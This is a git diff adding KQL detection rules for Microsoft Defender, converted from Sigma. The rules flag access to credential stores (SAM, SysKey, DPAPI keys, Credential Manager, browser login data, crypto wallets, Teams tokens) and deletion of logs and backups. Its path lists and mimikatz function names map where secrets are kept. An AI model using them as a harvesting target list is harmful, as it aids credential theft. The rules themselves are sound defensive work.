+// Currently the rule only covers the default Signal installation path in AppData\Roaming. Signal Portable installations may use different paths based on user configuration. Additional paths can be added to the selection as needed.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003
+// False Positives:
+//   - Unlikely, but possible from AV or backup software accessing the files.
+
+DeviceRegistryEvents
+| where (RegistryKey endswith "\\AppData\\Roaming\\Signal*" and (RegistryKey endswith "\\config.json" or RegistryKey endswith "\\db.sqlite")) and (not((InitiatingProcessFolderPath endswith "\\signal-portable.exe" or InitiatingProcessFolderPath endswith "\\signal.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/builtin/security/potential_secure_deletion_with_sdelete.kql b/KQL/rules/windows/builtin/security/potential_secure_deletion_with_sdelete.kql
new file mode 100644
index 00000000..1083ee9d
--- /dev/null
+++ b/KQL/rules/windows/builtin/security/potential_secure_deletion_with_sdelete.kql
@@ -0,0 +1,13 @@
+// Title: Potential Secure Deletion with SDelete
+// Author: Thomas Patzke
+// Date: 2017-06-14
+// Level: medium
+// Description: Detects files that have extensions commonly seen while SDelete is used to wipe files.
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.defense-evasion, attack.t1070.004, attack.t1027.005, attack.t1485, attack.t1553.002, attack.s0195
+// False Positives:
+//   - Legitimate usage of SDelete
+//   - Files that are interacted with that have these extensions legitimately
+
+DeviceRegistryEvents
+| where RegistryKey endswith ".AAA" or RegistryKey endswith ".ZZZ"
\ No newline at end of file
diff --git a/KQL/rules/windows/builtin/security/processes_accessing_the_microphone_and_webcam.kql b/KQL/rules/windows/builtin/security/processes_accessing_the_microphone_and_webcam.kql
new file mode 100644
index 00000000..b9354612
--- /dev/null
+++ b/KQL/rules/windows/builtin/security/processes_accessing_the_microphone_and_webcam.kql
@@ -0,0 +1,10 @@
+// Title: Processes Accessing the Microphone and Webcam
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
+// Date: 2020-06-07
+// Level: medium
+// Description: Potential adversaries accessing the microphone and webcam in an endpoint.
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1123
+
+DeviceRegistryEvents
+| where RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\ConsentStore\\microphone\\NonPackaged" or RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\ConsentStore\\webcam\\NonPackaged"
\ No newline at end of file
diff --git a/KQL/rules/windows/builtin/security/sam_registry_hive_handle_request.kql b/KQL/rules/windows/builtin/security/sam_registry_hive_handle_request.kql
new file mode 100644
index 00000000..42193b52
--- /dev/null
+++ b/KQL/rules/windows/builtin/security/sam_registry_hive_handle_request.kql
@@ -0,0 +1,10 @@
+// Title: SAM Registry Hive Handle Request
+// Author: Roberto Rodriguez @Cyb3rWard0g
+// Date: 2019-08-12
+// Level: high
+// Description: Detects handles requested to SAM registry hive
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1012, attack.credential-access, attack.t1552.002
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\SAM"
\ No newline at end of file
diff --git a/KQL/rules/windows/builtin/security/suspicious_teams_application_related_objectacess_event.kql b/KQL/rules/windows/builtin/security/suspicious_teams_application_related_objectacess_event.kql
new file mode 100644
index 00000000..d3577940
--- /dev/null
+++ b/KQL/rules/windows/builtin/security/suspicious_teams_application_related_objectacess_event.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Teams Application Related ObjectAcess Event
+// Author: @SerkinValery
+// Date: 2022-09-16
+// Level: high
+// Description: Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1528
+
+DeviceRegistryEvents
+| where (RegistryKey contains "\\Microsoft\\Teams\\Cookies" or RegistryKey contains "\\Microsoft\\Teams\\Local Storage\\leveldb") and (not(InitiatingProcessFolderPath contains "\\Microsoft\\Teams\\current\\Teams.exe"))
\ No newline at end of file
diff --git a/KQL/rules/windows/builtin/security/syskey_registry_keys_access.kql b/KQL/rules/windows/builtin/security/syskey_registry_keys_access.kql
new file mode 100644
index 00000000..ddf7c896
--- /dev/null
+++ b/KQL/rules/windows/builtin/security/syskey_registry_keys_access.kql
@@ -0,0 +1,10 @@
+// Title: SysKey Registry Keys Access
+// Author: Roberto Rodriguez @Cyb3rWard0g
+// Date: 2019-08-12
+// Level: high
+// Description: Detects handle requests and access operations to specific registry keys to calculate the SysKey
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1012
+
+DeviceRegistryEvents
+| where RegistryKey endswith "lsa\\JD" or RegistryKey endswith "lsa\\GBG" or RegistryKey endswith "lsa\\Skew1" or RegistryKey endswith "lsa\\Data"
\ No newline at end of file
diff --git a/KQL/rules/windows/builtin/security/wce_wceaux_dll_access.kql b/KQL/rules/windows/builtin/security/wce_wceaux_dll_access.kql
new file mode 100644
index 00000000..8983af2a
--- /dev/null
+++ b/KQL/rules/windows/builtin/security/wce_wceaux_dll_access.kql
@@ -0,0 +1,10 @@
+// Title: WCE wceaux.dll Access
+// Author: Thomas Patzke
+// Date: 2017-06-14
+// Level: critical
+// Description: Detects wceaux.dll access while WCE pass-the-hash remote command execution on source host
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003, attack.s0005
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\wceaux.dll"
\ No newline at end of file
diff --git a/KQL/rules/windows/builtin/security/windows_defender_exclusion_list_modified.kql b/KQL/rules/windows/builtin/security/windows_defender_exclusion_list_modified.kql
new file mode 100644
index 00000000..fe85c5a5
--- /dev/null
+++ b/KQL/rules/windows/builtin/security/windows_defender_exclusion_list_modified.kql
@@ -0,0 +1,12 @@
+// Title: Windows Defender Exclusion List Modified
+// Author: @BarryShooshooga
+// Date: 2019-10-26
+// Level: medium
+// Description: Detects modifications to the Windows Defender exclusion registry key. This could indicate a potentially suspicious or even malicious activity by an attacker trying to add a new exclusion in order to bypass security.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+//   - Intended exclusions by administrators
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\Microsoft\\Windows Defender\\Exclusions*"
\ No newline at end of file
diff --git a/KQL/rules/windows/builtin/security/wmi_persistence_security.kql b/KQL/rules/windows/builtin/security/wmi_persistence_security.kql
new file mode 100644
index 00000000..7a92d7b3
--- /dev/null
+++ b/KQL/rules/windows/builtin/security/wmi_persistence_security.kql
@@ -0,0 +1,12 @@
+// Title: WMI Persistence - Security
+// Author: Florian Roth (Nextron Systems), Gleb Sukhodolskiy, Timur Zinniatullin oscd.community
+// Date: 2017-08-22
+// Level: medium
+// Description: Detects suspicious WMI event filter and command line event consumer based on WMI and Security Logs.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.privilege-escalation, attack.t1546.003
+// False Positives:
+//   - Unknown (data set is too small; further testing needed)
+
+DeviceRegistryEvents
+| where RegistryKey contains "subscription"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_access/access_to_crypto_currency_wallets_by_uncommon_applications.kql b/KQL/rules/windows/file/file_access/access_to_crypto_currency_wallets_by_uncommon_applications.kql
new file mode 100644
index 00000000..6d4e9790
--- /dev/null
+++ b/KQL/rules/windows/file/file_access/access_to_crypto_currency_wallets_by_uncommon_applications.kql
@@ -0,0 +1,16 @@
+// Title: Access To Crypto Currency Wallets By Uncommon Applications
+// Author: X__Junior (Nextron Systems)
+// Date: 2024-07-29
+// Level: medium
+// Description: Detects file access requests to crypto currency files by uncommon processes.
+// Could indicate potential attempt of crypto currency wallet stealing.
+// MITRE Tactic: Credential Access
+// Tags: attack.t1003, attack.credential-access
+// False Positives:
+//   - Antivirus, Anti-Spyware, Anti-Malware Software
+//   - Backup software
+//   - Legitimate software installed on partitions other than "C:\"
+//   - Searching software such as "everything.exe"
+
+DeviceFileEvents
+| where ((FileName contains "\\AppData\\Roaming\\Ethereum\\keystore\\" or FileName contains "\\AppData\\Roaming\\EthereumClassic\\keystore\\" or FileName contains "\\AppData\\Roaming\\monero\\wallets\\") or (FileName endswith "\\AppData\\Roaming\\Bitcoin\\wallet.dat" or FileName endswith "\\AppData\\Roaming\\BitcoinABC\\wallet.dat" or FileName endswith "\\AppData\\Roaming\\BitcoinSV\\wallet.dat" or FileName endswith "\\AppData\\Roaming\\DashCore\\wallet.dat" or FileName endswith "\\AppData\\Roaming\\DogeCoin\\wallet.dat" or FileName endswith "\\AppData\\Roaming\\Litecoin\\wallet.dat" or FileName endswith "\\AppData\\Roaming\\Ripple\\wallet.dat" or FileName endswith "\\AppData\\Roaming\\Zcash\\wallet.dat")) and (not(((InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\system32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\") or InitiatingProcessFolderPath =~ "System"))) and (not(((InitiatingProcessFolderPath endswith "\\MpCopyAccelerator.exe" or InitiatingProcessFolderPath endswith "\\MsMpEng.exe") and InitiatingProcessFolderPath startswith "C:\\ProgramData\\Microsoft\\Windows Defender\\")))
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_access/access_to_potentially_sensitive_sysvol_files_by_uncommon_applications.kql b/KQL/rules/windows/file/file_access/access_to_potentially_sensitive_sysvol_files_by_uncommon_applications.kql
new file mode 100644
index 00000000..0a07ab8a
--- /dev/null
+++ b/KQL/rules/windows/file/file_access/access_to_potentially_sensitive_sysvol_files_by_uncommon_applications.kql
@@ -0,0 +1,10 @@
+// Title: Access To Potentially Sensitive Sysvol Files By Uncommon Applications
+// Author: frack113
+// Date: 2023-12-21
+// Level: medium
+// Description: Detects file access requests to potentially sensitive files hosted on the Windows Sysvol share.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1552.006
+
+DeviceFileEvents
+| where ((FileName contains "\\sysvol\\" and FileName contains "\\Policies\\") and (FileName endswith "audit.csv" or FileName endswith "Files.xml" or FileName endswith "GptTmpl.inf" or FileName endswith "groups.xml" or FileName endswith "Registry.pol" or FileName endswith "Registry.xml" or FileName endswith "scheduledtasks.xml" or FileName endswith "scripts.ini" or FileName endswith "services.xml") and FileName startswith "\\") and (not((InitiatingProcessFolderPath =~ "C:\\Windows\\explorer.exe" or (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\system32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_access/access_to_windows_credential_history_file_by_uncommon_applications.kql b/KQL/rules/windows/file/file_access/access_to_windows_credential_history_file_by_uncommon_applications.kql
new file mode 100644
index 00000000..1ae442a2
--- /dev/null
+++ b/KQL/rules/windows/file/file_access/access_to_windows_credential_history_file_by_uncommon_applications.kql
@@ -0,0 +1,11 @@
+// Title: Access To Windows Credential History File By Uncommon Applications
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-10-17
+// Level: medium
+// Description: Detects file access requests to the Windows Credential History File by an uncommon application.
+// This can be a sign of credential stealing. Example case would be usage of mimikatz "dpapi::credhist" function
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1555.004
+
+DeviceFileEvents
+| where FileName endswith "\\Microsoft\\Protect\\CREDHIST" and (not((InitiatingProcessFolderPath =~ "C:\\Windows\\explorer.exe" or (InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\system32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_access/access_to_windows_dpapi_master_keys_by_uncommon_applications.kql b/KQL/rules/windows/file/file_access/access_to_windows_dpapi_master_keys_by_uncommon_applications.kql
new file mode 100644
index 00000000..631e6f79
--- /dev/null
+++ b/KQL/rules/windows/file/file_access/access_to_windows_dpapi_master_keys_by_uncommon_applications.kql
@@ -0,0 +1,11 @@
+// Title: Access To Windows DPAPI Master Keys By Uncommon Applications
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-10-17
+// Level: medium
+// Description: Detects file access requests to the the Windows Data Protection API Master keys by an uncommon application.
+// This can be a sign of credential stealing. Example case would be usage of mimikatz "dpapi::masterkey" function
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1555.004
+
+DeviceFileEvents
+| where (FileName contains "\\Microsoft\\Protect\\S-1-5-18\\" or FileName contains "\\Microsoft\\Protect\\S-1-5-21-") and (not((InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\system32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\")))
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_access/credential_manager_access_by_uncommon_applications.kql b/KQL/rules/windows/file/file_access/credential_manager_access_by_uncommon_applications.kql
new file mode 100644
index 00000000..198e3fad
--- /dev/null
+++ b/KQL/rules/windows/file/file_access/credential_manager_access_by_uncommon_applications.kql
@@ -0,0 +1,13 @@
+// Title: Credential Manager Access By Uncommon Applications
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-10-11
+// Level: medium
+// Description: Detects suspicious processes based on name and location that access the windows credential manager and vault.
+// Which can be a sign of credential stealing. Example case would be usage of mimikatz "dpapi::cred" function
+// MITRE Tactic: Credential Access
+// Tags: attack.t1003, attack.credential-access
+// False Positives:
+//   - Legitimate software installed by the users for example in the "AppData" directory may access these files (for any reason).
+
+DeviceFileEvents
+| where (FileName contains "\\AppData\\Local\\Microsoft\\Credentials\\" or FileName contains "\\AppData\\Roaming\\Microsoft\\Credentials\\" or FileName contains "\\AppData\\Local\\Microsoft\\Vault\\" or FileName contains "\\ProgramData\\Microsoft\\Vault\\") and (not((InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\system32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\")))
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_access/microsoft_teams_sensitive_file_access_by_uncommon_applications.kql b/KQL/rules/windows/file/file_access/microsoft_teams_sensitive_file_access_by_uncommon_applications.kql
new file mode 100644
index 00000000..5c885f46
--- /dev/null
+++ b/KQL/rules/windows/file/file_access/microsoft_teams_sensitive_file_access_by_uncommon_applications.kql
@@ -0,0 +1,10 @@
+// Title: Microsoft Teams Sensitive File Access By Uncommon Applications
+// Author: @SerkinValery
+// Date: 2024-07-22
+// Level: medium
+// Description: Detects file access attempts to sensitive Microsoft teams files (leveldb, cookies) by an uncommon process.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1528
+
+DeviceFileEvents
+| where (FileName contains "\\Microsoft\\Teams\\Cookies" or FileName contains "\\Microsoft\\Teams\\Local Storage\\leveldb") and (not(InitiatingProcessFolderPath endswith "\\Microsoft\\Teams\\current\\Teams.exe"))
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_access/suspicious_file_access_to_browser_credential_storage.kql b/KQL/rules/windows/file/file_access/suspicious_file_access_to_browser_credential_storage.kql
new file mode 100644
index 00000000..d5163b72
--- /dev/null
+++ b/KQL/rules/windows/file/file_access/suspicious_file_access_to_browser_credential_storage.kql
@@ -0,0 +1,16 @@
+// Title: Suspicious File Access to Browser Credential Storage
+// Author: frack113, X__Junior (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems), Parth-FourCore
+// Date: 2025-05-22
+// Level: low
+// Description: Detects file access to browser credential storage paths by non-browser processes, which may indicate credential access attempts.
+// Adversaries may attempt to access browser credential storage to extract sensitive information such as usernames and passwords or cookies.
+// This behavior is often commonly observed in credential stealing malware.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1555.003, attack.discovery, attack.t1217
+// False Positives:
+//   - Antivirus, Anti-Spyware, Anti-Malware Software
+//   - Legitimate software accessing browser data for synchronization or backup purposes.
+//   - Legitimate software installed on partitions other than "C:\"
+
+DeviceFileEvents
+| where ((FileName contains "\\Sputnik\\Sputnik" or FileName contains "\\MapleStudio\\ChromePlus" or FileName contains "\\QIP Surf" or FileName contains "\\BlackHawk" or FileName contains "\\7Star\\7Star" or FileName contains "\\CatalinaGroup\\Citrio" or FileName contains "\\Google\\Chrome" or FileName contains "\\Coowon\\Coowon" or FileName contains "\\CocCoc\\Browser" or FileName contains "\\uCozMedia\\Uran" or FileName contains "\\Tencent\\QQBrowser" or FileName contains "\\Orbitum" or FileName contains "\\Slimjet" or FileName contains "\\Iridium" or FileName contains "\\Vivaldi" or FileName contains "\\Chromium" or FileName contains "\\GhostBrowser" or FileName contains "\\CentBrowser" or FileName contains "\\Xvast" or FileName contains "\\Chedot" or FileName contains "\\SuperBird" or FileName contains "\\360Browser\\Browser" or FileName contains "\\360Chrome\\Chrome" or FileName contains "\\Comodo\\Dragon" or FileName contains "\\BraveSoftware\\Brave-Browser" or FileName contains "\\Torch" or FileName contains "\\UCBrowser\\" or FileName contains "\\Blisk" or FileName contains "\\Epic Privacy Browser" or FileName contains "\\Nichrome" or FileName contains "\\Amigo" or FileName contains "\\Kometa" or FileName contains "\\Xpom" or FileName contains "\\Microsoft\\Edge" or FileName contains "\\Liebao7Default\\EncryptedStorage" or FileName contains "\\AVAST Software\\Browser" or FileName contains "\\Kinza" or FileName contains "\\Mozilla\\SeaMonkey\\" or FileName contains "\\Comodo\\IceDragon\\" or FileName contains "\\8pecxstudios\\Cyberfox\\" or FileName contains "\\FlashPeak\\SlimBrowser\\" or FileName contains "\\Moonchild Productions\\Pale Moon\\") and (FileName contains "\\Profiles\\" or FileName contains "\\User Data") and ((FileName contains "\\Login Data" or FileName contains "\\Cookies" or FileName contains "\\EncryptedStorage" or FileName contains "\\WebCache\\") or (FileName endswith "cert9.db" or FileName endswith "cookies.sqlite" or FileName endswith "formhistory.sqlite" or FileName endswith "key3.db" or FileName endswith "key4.db" or FileName endswith "Login Data.sqlite" or FileName endswith "logins.json" or FileName endswith "places.sqlite"))) and (not(((InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\") or (InitiatingProcessFolderPath endswith "\\Sputnik.exe" or InitiatingProcessFolderPath endswith "\\ChromePlus.exe" or InitiatingProcessFolderPath endswith "\\QIP Surf.exe" or InitiatingProcessFolderPath endswith "\\BlackHawk.exe" or InitiatingProcessFolderPath endswith "\\7Star.exe" or InitiatingProcessFolderPath endswith "\\Sleipnir5.exe" or InitiatingProcessFolderPath endswith "\\Citrio.exe" or InitiatingProcessFolderPath endswith "\\Chrome SxS.exe" or InitiatingProcessFolderPath endswith "\\Chrome.exe" or InitiatingProcessFolderPath endswith "\\Coowon.exe" or InitiatingProcessFolderPath endswith "\\CocCocBrowser.exe" or InitiatingProcessFolderPath endswith "\\Uran.exe" or InitiatingProcessFolderPath endswith "\\QQBrowser.exe" or InitiatingProcessFolderPath endswith "\\Orbitum.exe" or InitiatingProcessFolderPath endswith "\\Slimjet.exe" or InitiatingProcessFolderPath endswith "\\Iridium.exe" or InitiatingProcessFolderPath endswith "\\Vivaldi.exe" or InitiatingProcessFolderPath endswith "\\Chromium.exe" or InitiatingProcessFolderPath endswith "\\GhostBrowser.exe" or InitiatingProcessFolderPath endswith "\\CentBrowser.exe" or InitiatingProcessFolderPath endswith "\\Xvast.exe" or InitiatingProcessFolderPath endswith "\\Chedot.exe" or InitiatingProcessFolderPath endswith "\\SuperBird.exe" or InitiatingProcessFolderPath endswith "\\360Browser.exe" or InitiatingProcessFolderPath endswith "\\360Chrome.exe" or InitiatingProcessFolderPath endswith "\\dragon.exe" or InitiatingProcessFolderPath endswith "\\brave.exe" or InitiatingProcessFolderPath endswith "\\torch.exe" or InitiatingProcessFolderPath endswith "\\UCBrowser.exe" or InitiatingProcessFolderPath endswith "\\BliskBrowser.exe" or InitiatingProcessFolderPath endswith "\\Epic Privacy Browser.exe" or InitiatingProcessFolderPath endswith "\\nichrome.exe" or InitiatingProcessFolderPath endswith "\\AmigoBrowser.exe" or InitiatingProcessFolderPath endswith "\\KometaBrowser.exe" or InitiatingProcessFolderPath endswith "\\XpomBrowser.exe" or InitiatingProcessFolderPath endswith "\\msedge.exe" or InitiatingProcessFolderPath endswith "\\LiebaoBrowser.exe" or InitiatingProcessFolderPath endswith "\\AvastBrowser.exe" or InitiatingProcessFolderPath endswith "\\Kinza.exe" or InitiatingProcessFolderPath endswith "\\seamonkey.exe" or InitiatingProcessFolderPath endswith "\\icedragon.exe" or InitiatingProcessFolderPath endswith "\\cyberfox.exe" or InitiatingProcessFolderPath endswith "\\SlimBrowser.exe" or InitiatingProcessFolderPath endswith "\\palemoon.exe") or (InitiatingProcessFolderPath contains "\\Sputnik\\" or InitiatingProcessFolderPath contains "\\MapleStudio\\" or InitiatingProcessFolderPath contains "\\QIP Surf\\" or InitiatingProcessFolderPath contains "\\BlackHawk\\" or InitiatingProcessFolderPath contains "\\7Star\\" or InitiatingProcessFolderPath contains "\\Fenrir Inc\\" or InitiatingProcessFolderPath contains "\\CatalinaGroup\\" or InitiatingProcessFolderPath contains "\\Google\\" or InitiatingProcessFolderPath contains "\\Coowon\\" or InitiatingProcessFolderPath contains "\\CocCoc\\" or InitiatingProcessFolderPath contains "\\uCozMedia\\" or InitiatingProcessFolderPath contains "\\Tencent\\" or InitiatingProcessFolderPath contains "\\Orbitum\\" or InitiatingProcessFolderPath contains "\\Slimjet\\" or InitiatingProcessFolderPath contains "\\Iridium\\" or InitiatingProcessFolderPath contains "\\Vivaldi\\" or InitiatingProcessFolderPath contains "\\Chromium\\" or InitiatingProcessFolderPath contains "\\GhostBrowser\\" or InitiatingProcessFolderPath contains "\\CentBrowser\\" or InitiatingProcessFolderPath contains "\\Xvast\\" or InitiatingProcessFolderPath contains "\\Chedot\\" or InitiatingProcessFolderPath contains "\\SuperBird\\" or InitiatingProcessFolderPath contains "\\360Browser\\" or InitiatingProcessFolderPath contains "\\360Chrome\\" or InitiatingProcessFolderPath contains "\\Comodo\\" or InitiatingProcessFolderPath contains "\\BraveSoftware\\" or InitiatingProcessFolderPath contains "\\Torch\\" or InitiatingProcessFolderPath contains "\\UCBrowser\\" or InitiatingProcessFolderPath contains "\\Blisk\\" or InitiatingProcessFolderPath contains "\\Epic Privacy Browser\\" or InitiatingProcessFolderPath contains "\\Nichrome\\" or InitiatingProcessFolderPath contains "\\Amigo\\" or InitiatingProcessFolderPath contains "\\Kometa\\" or InitiatingProcessFolderPath contains "\\Xpom\\" or InitiatingProcessFolderPath contains "\\Microsoft\\" or InitiatingProcessFolderPath contains "\\Liebao7\\" or InitiatingProcessFolderPath contains "\\AVAST Software\\" or InitiatingProcessFolderPath contains "\\Kinza\\" or InitiatingProcessFolderPath contains "\\Mozilla\\" or InitiatingProcessFolderPath contains "\\8pecxstudios\\" or InitiatingProcessFolderPath contains "\\FlashPeak\\" or InitiatingProcessFolderPath contains "\\Moonchild Productions\\") or (InitiatingProcessFolderPath =~ "System" and InitiatingProcessParentFileName =~ "Idle")))) and (not(((InitiatingProcessFolderPath contains "\\Microsoft\\Windows Defender\\" and (InitiatingProcessFolderPath endswith "\\MpCopyAccelerator.exe" or InitiatingProcessFolderPath endswith "\\MsMpEng.exe")) or InitiatingProcessParentFileName =~ "msiexec.exe" or InitiatingProcessFolderPath endswith "\\everything.exe" or (InitiatingProcessFolderPath endswith "\\thor.exe" or InitiatingProcessFolderPath endswith "\\thor64.exe"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_change/unusual_file_modification_by_dns_exe.kql b/KQL/rules/windows/file/file_change/unusual_file_modification_by_dns_exe.kql
new file mode 100644
index 00000000..8b8676a8
--- /dev/null
+++ b/KQL/rules/windows/file/file_change/unusual_file_modification_by_dns_exe.kql
@@ -0,0 +1,10 @@
+// Title: Unusual File Modification by dns.exe
+// Author: Tim Rauch (Nextron Systems), Elastic (idea)
+// Date: 2022-09-27
+// Level: high
+// Description: Detects an unexpected file being modified by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.initial-access, attack.t1133
+
+DeviceFileEvents
+| where InitiatingProcessFolderPath endswith "\\dns.exe" and (not(FolderPath endswith "\\dns.log"))
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_delete/ads_zone_identifier_deleted_by_uncommon_application.kql b/KQL/rules/windows/file/file_delete/ads_zone_identifier_deleted_by_uncommon_application.kql
new file mode 100644
index 00000000..c81b7387
--- /dev/null
+++ b/KQL/rules/windows/file/file_delete/ads_zone_identifier_deleted_by_uncommon_application.kql
@@ -0,0 +1,12 @@
+// Title: ADS Zone.Identifier Deleted By Uncommon Application
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-09-04
+// Level: medium
+// Description: Detects the deletion of the "Zone.Identifier" ADS by an uncommon process. Attackers can leverage this in order to bypass security restrictions that make use of the ADS such as Microsoft Office apps.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070.004
+// False Positives:
+//   - Other third party applications not listed.
+
+DeviceFileEvents
+| where FolderPath endswith ":Zone.Identifier" and (not((InitiatingProcessFolderPath in~ ("C:\\Program Files\\PowerShell\\7-preview\\pwsh.exe", "C:\\Program Files\\PowerShell\\7\\pwsh.exe", "C:\\Windows\\explorer.exe", "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "C:\\Windows\\SysWOW64\\explorer.exe", "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe")))) and (not(((InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe", "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe", "C:\\Program Files\\Mozilla Firefox\\firefox.exe")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", "C:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe")))))
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_delete/backup_files_deleted.kql b/KQL/rules/windows/file/file_delete/backup_files_deleted.kql
new file mode 100644
index 00000000..dc38bd01
--- /dev/null
+++ b/KQL/rules/windows/file/file_delete/backup_files_deleted.kql
@@ -0,0 +1,12 @@
+// Title: Backup Files Deleted
+// Author: frack113
+// Date: 2022-01-02
+// Level: medium
+// Description: Detects deletion of files with extensions often used for backup files. Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1490
+// False Positives:
+//   - Legitimate usage
+
+DeviceFileEvents
+| where (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\wt.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe") and (FolderPath endswith ".VHD" or FolderPath endswith ".bac" or FolderPath endswith ".bak" or FolderPath endswith ".wbcat" or FolderPath endswith ".bkf" or FolderPath endswith ".set" or FolderPath endswith ".win" or FolderPath endswith ".dsk")
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_delete/eventlog_evtx_file_deleted.kql b/KQL/rules/windows/file/file_delete/eventlog_evtx_file_deleted.kql
new file mode 100644
index 00000000..93c139c6
--- /dev/null
+++ b/KQL/rules/windows/file/file_delete/eventlog_evtx_file_deleted.kql
@@ -0,0 +1,10 @@
+// Title: EventLog EVTX File Deleted
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-02-15
+// Level: medium
+// Description: Detects the deletion of the event log files which may indicate an attempt to destroy forensic evidence
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070
+
+DeviceFileEvents
+| where FolderPath endswith ".evtx" and FolderPath startswith "C:\\Windows\\System32\\winevt\\Logs\\"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_delete/exchange_powershell_cmdlet_history_deleted.kql b/KQL/rules/windows/file/file_delete/exchange_powershell_cmdlet_history_deleted.kql
new file mode 100644
index 00000000..c9c09a88
--- /dev/null
+++ b/KQL/rules/windows/file/file_delete/exchange_powershell_cmdlet_history_deleted.kql
@@ -0,0 +1,12 @@
+// Title: Exchange PowerShell Cmdlet History Deleted
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-10-26
+// Level: high
+// Description: Detects the deletion of the Exchange PowerShell cmdlet History logs which may indicate an attempt to destroy forensic evidence
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070
+// False Positives:
+//   - Possible FP during log rotation
+
+DeviceFileEvents
+| where FolderPath contains "_Cmdlet_" and FolderPath startswith "\\Logging\\CmdletInfra\\LocalPowerShell\\Cmdlet\\"
\ No newline at end of file
